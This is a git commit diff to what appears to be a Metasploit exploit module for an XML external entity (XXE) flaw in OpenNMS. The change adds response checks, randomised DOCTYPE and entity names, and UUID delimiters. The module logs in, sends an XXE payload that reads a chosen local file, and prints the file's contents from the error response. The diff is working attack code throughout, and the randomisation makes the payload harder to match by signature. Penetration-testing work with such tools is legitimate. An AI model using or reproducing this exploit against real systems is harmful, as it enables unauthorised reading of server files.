Added error checks, randomness, and uuid delimeter

jstnkndy · jstnkndy · commit 0490af8ba813 · 2015-03-17T10:20:22.000-04:00
diff --git a/modules/exploits/linux/http/opennms_xxe.rb b/modules/exploits/linux/http/opennms_xxe.rb
@@ -50,6 +50,7 @@ def initialize(info = {})
   def run
 
     print_status("Logging in to grab a valid session cookie")
+
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'j_spring_security_check'),
@@ -60,6 +61,12 @@ def run
       },
     })
 
+    if res.nil?
+      fail_with("No response from POST request")
+    elsif res.code != 302
+      fail_with("Non-302 response from POST request")
+    end
+
     unless res.headers["Location"].include? "index.jsp"
       fail_with(Failure::Unknown, 'Authentication failed')
     end
@@ -68,7 +75,16 @@ def run
 
     print_status("Got cookie, going for the goods")
 
-    xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file://'+datastore["FILEPATH"]+'" >]><foo>&xxe;</foo>'
+    rand_doctype= Rex::Text.rand_text_alpha(rand(1..10))
+    rand_entity1 = Rex::Text.rand_text_alpha(rand(1..10))
+    rand_entity2 = Rex::Text.rand_text_alpha(rand(1..10))
+    delimiter = SecureRandom.uuid
+
+    xxe = %Q^<?xml version="1.0" encoding="ISO-8859-1"?>
+    <!DOCTYPE #{rand_doctype} [
+    <!ELEMENT #{rand_entity1} ANY >
+    <!ENTITY #{rand_entity2} SYSTEM "file://#{datastore["FILEPATH"]}" >
+    ]><#{rand_entity1}>#{delimiter}&#{rand_entity2};#{delimiter}</#{rand_entity1}>^
 
     res = send_request_raw({
       'method' => 'POST',
@@ -77,15 +93,15 @@ def run
       'cookie' => cookie
     })
 
-    # extract filepath data from response and remove preceding errors
+    # extract filepath data from response
 
-    if res.body =~ /<title.*\/?>(.+)<\/title\/?>/m
-      title = $1
+    if res and res.code == 400 and res.message =~ /#{delimiter}(.+)#{delimiter}/
+      result = $1
+      print_good("#{result}")
+    else
+      fail_with(Failure::Unknown, 'Error fetching file, try another')
     end
 
-    result = title.match(/"(.*)/m)
-
-    print_good("#{result}")
-
   end
 end
+
